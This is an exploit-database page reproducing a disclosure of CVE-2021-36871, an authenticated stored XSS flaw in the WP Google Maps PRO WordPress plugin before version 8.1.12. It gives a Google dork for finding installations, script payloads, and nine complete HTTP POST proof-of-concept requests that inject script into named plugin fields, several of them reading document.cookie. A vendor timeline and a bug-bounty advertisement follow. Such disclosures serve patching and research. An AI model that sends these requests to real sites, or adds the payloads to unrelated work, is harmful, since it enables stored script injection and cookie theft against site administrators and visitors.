Advertisement






WP Google Maps PRO Add-on Plugin < 8.1.12 - Authenticated Persistent XSS

CVE Category Price Severity
CVE-2021-36871 CWE-79 Not specified High
Author Risk Exploitation Type Date
Dmitriy Shulgin High Remote 2021-09-20
CPE
cpe:cpe:/a:wp-google-maps:pro_add-on_plugin:8.1.11
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021090108

Below is a copy:

WP Google Maps PRO Add-on Plugin < 8.1.12 - Authenticated Persistent XSS
[+] :: VULNERABILITY: WP Google Maps PRO Add-on Plugin < 8.1.12 - Authenticated Persistent XSS
[+] :: GOOGLE DORK: inurl:/wp-content/plugins/wp-google-maps-pro/
[+] :: DATE: 2021-06-11
[+] :: SECURITY RESEARCHER: Visse [ https://visse.ru ]
[+] :: VENDOR: WP Google Maps [ https://www.wpgmaps.com ]
[+] :: SOFTWARE VERSION: < 8.1.12
[+] :: SOFTWARE LINK: https://www.wpgmaps.com/purchase-professional-version/
[+] :: CVSS: 3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N
[+] :: CWE: CWE-79
[+] :: CVE: CVE-2021-36871



[i] == [ Info: ]

An Authenticated Persistent XSS vulnerability was discovered in the WP Google Maps PRO Add-on Plugin through v8.1.12 for WordPress.

Vulnerable parameter(s): &dataset_name, &title, &description, &link, &names[], &icons[], &attributes[] (x2), &wpgmaps_marker_category_name.



[?] == [ Code: ]

-



[$] == [ Impact: ]

Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.



[%] == [ Payloads: ]

<script>alert(origin)</script>

<script>alert(document.domain)</script>



[!] == [ PoC #1 | Authenticated Persistent XSS | Maps > Heatmaps > &dataset_name: ]

POST /wp-json/wpgmza/v1/heatmaps/ HTTP/2
Host: blackcore.ru
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: f0f10b488b
X-Requested-With: XMLHttpRequest
Content-Length: 532

id=-1&map_id=1&dataset_name=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&gradient=%5B%22rgba(0%2C+0%2C+255%2C+0)%22%2C+%22rgba(0%2C+255%2C+255%2C+1)%22%2C+%22rgba(0%2C+255%2C+0%2C+1)%22%2C+%22rgba(255%2C+255%2C+0%2C+1)%22%2C+%22rgba(255%2C+0%2C+0%2C+1)%22%5D&opacity=0.5&radius=20&dataset=



[!] == [ PoC #2 | Authenticated Persistent XSS | Maps > Markers > &title: ]

POST /wp-json/wpgmza/v1/markers/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: e7db87e0a9
X-Requested-With: XMLHttpRequest
Content-Length: 1073

id=-1&map_id=1&title=%3Cscript%3Ealert%28origin%29%3C%2Fscript%3E&address=+450+Dewie+Street+Thunder+Bay%2C+ON+93657+Canada&lat=48.3808951&lng=-89.2476823&link=&icon=&retina=0&category=&anim=0&infoopen=0&approved=1&sticky=0&description=



[!] == [ PoC #3 | Authenticated Persistent XSS | Maps > Markers > &link: ]

POST /wp-json/wpgmza/v1/markers/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: e7db87e0a9
X-Requested-With: XMLHttpRequest
Content-Length: 1073

id=-1&map_id=1&title=PoC&address=+450+Dewie+Street+Thunder+Bay%2C+ON+93657+Canada&lat=48.3808951&lng=-89.2476823&link=%3Cscript%3Ealert%28origin%29%3C%2Fscript%3E&icon=&retina=0&category=&anim=0&infoopen=0&approved=1&sticky=0&description=



[!] == [ PoC #4 | Authenticated Persistent XSS | Maps > Markers > &description: ]

POST /wp-json/wpgmza/v1/markers/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: e7db87e0a9
X-Requested-With: XMLHttpRequest
Content-Length: 1073

id=-1&map_id=1&title=PoC&address=+450+Dewie+Street+Thunder+Bay%2C+ON+93657+Canada&lat=48.3808951&lng=-89.2476823&link=&icon=&retina=0&category=&anim=0&infoopen=0&approved=1&sticky=0&description=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E



[!] == [ PoC #5 | Authenticated Persistent XSS | Custom Fields > Name > &names[]: ]

POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 483

action=wpgmza_save_custom_fields&security=337841e1c8&stack_order%5B%5D=0&ids%5B%5D=2&names%5B%5D=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&icons%5B%5D=&attributes%5B%5D=&widget_types%5B%5D=text&display_in_infowindows%5B2%5D=2&display_in_marker_listings%5B2%5D=2



[!] == [ PoC #6 | Authenticated Persistent XSS | Custom Fields > Icon > &icons[]: ]

POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 483

action=wpgmza_save_custom_fields&security=337841e1c8&stack_order%5B%5D=0&ids%5B%5D=2&names%5B%5D=PoC&icons%5B%5D=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&attributes%5B%5D=&widget_types%5B%5D=text&display_in_infowindows%5B2%5D=2&display_in_marker_listings%5B2%5D=2



[!] == [ PoC #7 | Authenticated Persistent XSS | Custom Fields > Attributes > Name > &attributes[]: ]

POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 483

action=wpgmza_save_custom_fields&security=337841e1c8&stack_order%5B%5D=0&ids%5B%5D=2&names%5B%5D=PoC&icons%5B%5D=&attributes%5B%5D=%7B%22%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%22%3A%22%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%22%7D&widget_types%5B%5D=text&display_in_infowindows%5B2%5D=2&display_in_marker_listings%5B2%5D=2



[!] == [ PoC #8 | Authenticated Persistent XSS | Custom Fields > Attributes > Value > &attributes[]: ]

POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 483

action=wpgmza_save_custom_fields&security=337841e1c8&stack_order%5B%5D=0&ids%5B%5D=2&names%5B%5D=PoC&icons%5B%5D=&attributes%5B%5D=%7B%22%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%22%3A%22%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%22%7D&widget_types%5B%5D=text&display_in_infowindows%5B2%5D=2&display_in_marker_listings%5B2%5D=2



[!] == [ PoC #9 | Authenticated Persistent XSS | Categories > Category Name > &wpgmaps_marker_category_name: ]

POST /wp-admin/admin.php?page=wp-google-maps-menu-categories HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 281

real_post_nonce=337841e1c8&wpgmaps_marker_category_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&upload_default_category_marker=&category_image=&parent_category=0&wpgmaps_marker_category_priority=8&assigned_to_map%5B%5D=ALL&wpgmza_save_marker_category=Save+Category+%C2%BB



[*] == [ Timeline: ]

2021.06.03 - WP Google Maps PRO Add-on Plugin v8.1.11 released
2021.06.11 - Multiple XSS issues discovered
2021.06.12 - Vendor contacted
2021.06.15 - WP Google Maps PRO Add-on Plugin v8.1.12 released



[@] == [ Contacts: ]

Website: visse.ru
LinkedIn: @visse
Medium: @visse
HackerOne: @visse



====================================================================
= Want money for vulnerabilities in the WordPress ecosystem? [Y/n] =
= ---------------------------------------------------------------- =
= [ Yes: ] Join the $ hunt here - https://patchstack.com/red-team/ =
= [ No:  ] Hunter, think twice and don't miss the chance to gain $ =
====================================================================

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum